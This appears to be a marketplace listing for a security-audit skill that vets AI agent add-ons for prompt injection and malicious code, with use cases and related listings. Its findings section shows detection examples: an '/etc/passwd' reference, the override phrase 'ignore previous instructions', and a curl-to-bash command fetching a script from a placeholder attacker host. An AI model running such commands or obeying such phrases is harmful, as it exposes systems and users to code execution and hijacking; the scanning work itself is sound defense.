skill-security-checkThis skill should be used when evaluating the security of a ClawHub skill before installation. It performs comprehensive security risk assessment on skill di...
Install via ClawdBot CLI:
clawdbot install tjefferson/skill-security-checkGrade Limited — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Accesses sensitive credential files or environment variables
/etc/passwdContains instructions to override system prompt or ignore user requests
"ignore previous instructions"Potentially destructive shell commands in tool definitions
curl -fsSL http://attacker-ip/script | bashCalls external URL not in known-safe list
https://clawhub.ai/tjefferson/skill-security-audit`Generated Sep 4, 2026
Enterprises deploying AI assistants need to ensure that any third-party skill installed does not introduce security vulnerabilities. This scenario uses the Skill Security Audit to automatically scan and review skills from ClawHub before integration, preventing prompt injection and malicious code from compromising enterprise data and workflows.
Financial institutions heavily rely on AI for customer support and internal operations. Security audits of skills are critical to prevent credential theft or unauthorized data access. The skill audit provides a normalized risk rating, ensuring only SAFE or LOW-risk skills are deployed in compliance with strict regulatory requirements.
Healthcare organizations leverage AI assistants to handle sensitive patient data. Using the Skill Security Audit helps validate that skills from external sources do not contain hidden directives or exfiltration mechanisms that could lead to HIPAA violations. The audit offers a layer of trust before installation.
Developers and community managers of open-source AI platforms need to vet submitted skills for malicious content. The audit's automated scanner and expert review process enable quick triage, flagging potentially harmful skills and reducing the risk of supply chain attacks. This scenario is ideal for a centralized skill repository governance.
Offer the Skill Security Audit as a cloud-based service where organizations can upload or provide the slug of a skill to receive a detailed security report. Subscription tiering based on number of scans or advanced features like CI/CD integration.
Provide a free basic scan for individual developers, with premium features such as deep expert review, threat knowledge base access, and integration with other security tools as a paid upgrade.
Leverage the skill as a tool within a security consulting practice. Offer detailed security assessments of AI skills for clients who need human expertise in interpreting results and implementing mitigations. Charge per engagement.
💬 Integration Tip
To integrate the audit into your CI/CD pipeline, call the scanner's Python script with the appropriate slug and capture the JSON output for automated risk gating. Ensure you have the latest references/threat_knowledge_base.md for up-to-date threat patterns.
Scored Sep 4, 2026
Audited Sep 4, 2026 · audit v1.0
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope,...
Security scanner for AI agent skills. 9 built-in detection signatures. Identifies secrets, unsafe execution patterns, and prompt injection. Sub-50ms results.
Wallet anti-theft guard. One-click scan for high-risk wallet approvals to protect user assets. Use when a user asks for a wallet security check, wallet healt...
Comprehensive security audit for an agent's full skill stack. Chains scanner, differ, trust-verifier, and health-monitor into a single assessment with priori...
GEO Audit — AI Search Visibility Checker for ChatGPT, Perplexity, Claude & Gemini. 29-point GEO readiness checklist: robots.txt AI crawler access, Index...
Senior SecOps engineer skill for application security, vulnerability management, compliance verification, and secure development practices. Runs SAST/DAST sc...